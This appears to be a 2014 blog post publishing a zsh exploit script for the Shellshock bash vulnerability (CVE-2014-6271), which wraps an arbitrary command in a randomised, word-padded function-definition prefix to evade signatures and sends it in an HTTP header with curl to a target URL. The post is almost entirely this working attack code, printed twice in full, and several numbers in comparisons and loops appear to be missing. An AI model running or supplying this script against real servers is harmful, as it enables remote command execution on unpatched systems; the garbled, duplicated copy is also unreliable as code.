CVE-2014-6271 Exploit
27 September, 2014 - 09:56
This is being maintained at https://github.com/lattera/exploits/blob/master/bash/CVE-2014-6271.zsh
#!/usr/bin/env zsh
# Copyright (c) 2014 Shawn Webb <lattera@gmail.com>
# Author: Shawn Webb <lattera@gmail.com>
# License: 2-clause BSD license
#
# Requirements:
# * zsh module: zsh/datetime
#
# USAGE: ${0} -c <command> [-d <NOP dictionary>] [-n <number of NOPS>] [-u <URL> [-H header]]
zmodload zsh/datetime
whitespace_sameline=$(echo " \t")
nopdict="/usr/share/dict/words"
numnops=$((${RANDOM} % 100))
function get_nop() {
RANDOM=${epochtime[2]}
if ! [ -f ${nopdict} ]; then
echo "nopfail"
return
fi
lines=$(wc -l ${nopdict} | awk '{print $1;}')
if [ ${#lines} -eq ]; then
echo "nopfail"
return
fi
rand=${RANDOM}
line=$((${rand} % ${lines}))
sed -n ${line}p ${nopdict}
}
function get_whitespace() {
RANDOM=${epochtime[2]}
str=""
upperbound=$((${RANDOM} % 100))
if [ ${upperbound} -eq ]; then
upperbound=1
fi
for ((i=1; i < ${upperbound}; i++)); do
str="${str}${whitespace_sameline[$((${RANDOM} % ${#whitespace_sameline}))]}"
done
echo -n ${str}
}
function create_preface() {
str="() {$(get_whitespace)"
for ((i=; i < ${numnops}; i++)); do
str="${str}$(get_nop)$(get_whitespace);"
done
str="${str}}$(get_whitespace)"
str="${str};$(get_whitespace)"
echo -n ${str}
}
if [ ${#@} -eq ]; then
echo "USAGE: ${0} -c <command> [-d <NOP dictionary>] [-n <number of NOPS>] [-u <URL> [-H header]]"
exit 1
fi
cmd=""
url=""
header="User-Agent: "
while getopts "c:d:H:n:u:" o; do
case "${o}" in
c)
cmd="$(create_preface) ${OPTARG}"
;;
d)
nopdict=${OPTARG}
;;
H)
header=${OPTARG}
;;
n)
numnops=${OPTARG}
;;
u)
url=${OPTARG}
;;
esac
done
if [ ${#url} -eq ]; then
echo ${cmd}
exit
fi
curl -H "${header}${cmd}" ${url}
# Copyright (c) 2014 Shawn Webb <lattera@gmail.com>
# Author: Shawn Webb <lattera@gmail.com>
# License: 2-clause BSD license
#
# Requirements:
# * zsh module: zsh/datetime
#
# USAGE: ${0} -c <command> [-d <NOP dictionary>] [-n <number of NOPS>] [-u <URL> [-H header]]
zmodload zsh/datetime
whitespace_sameline=$(echo " \t")
nopdict="/usr/share/dict/words"
numnops=$((${RANDOM} % 100))
function get_nop() {
RANDOM=${epochtime[2]}
if ! [ -f ${nopdict} ]; then
echo "nopfail"
return
fi
lines=$(wc -l ${nopdict} | awk '{print $1;}')
if [ ${#lines} -eq ]; then
echo "nopfail"
return
fi
rand=${RANDOM}
line=$((${rand} % ${lines}))
sed -n ${line}p ${nopdict}
}
function get_whitespace() {
RANDOM=${epochtime[2]}
str=""
upperbound=$((${RANDOM} % 100))
if [ ${upperbound} -eq ]; then
upperbound=1
fi
for ((i=1; i < ${upperbound}; i++)); do
str="${str}${whitespace_sameline[$((${RANDOM} % ${#whitespace_sameline}))]}"
done
echo -n ${str}
}
function create_preface() {
str="() {$(get_whitespace)"
for ((i=; i < ${numnops}; i++)); do
str="${str}$(get_nop)$(get_whitespace);"
done
str="${str}}$(get_whitespace)"
str="${str};$(get_whitespace)"
echo -n ${str}
}
if [ ${#@} -eq ]; then
echo "USAGE: ${0} -c <command> [-d <NOP dictionary>] [-n <number of NOPS>] [-u <URL> [-H header]]"
exit 1
fi
cmd=""
url=""
header="User-Agent: "
while getopts "c:d:H:n:u:" o; do
case "${o}" in
c)
cmd="$(create_preface) ${OPTARG}"
;;
d)
nopdict=${OPTARG}
;;
H)
header=${OPTARG}
;;
n)
numnops=${OPTARG}
;;
u)
url=${OPTARG}
;;
esac
done
if [ ${#url} -eq ]; then
echo ${cmd}
exit
fi
curl -H "${header}${cmd}" ${url}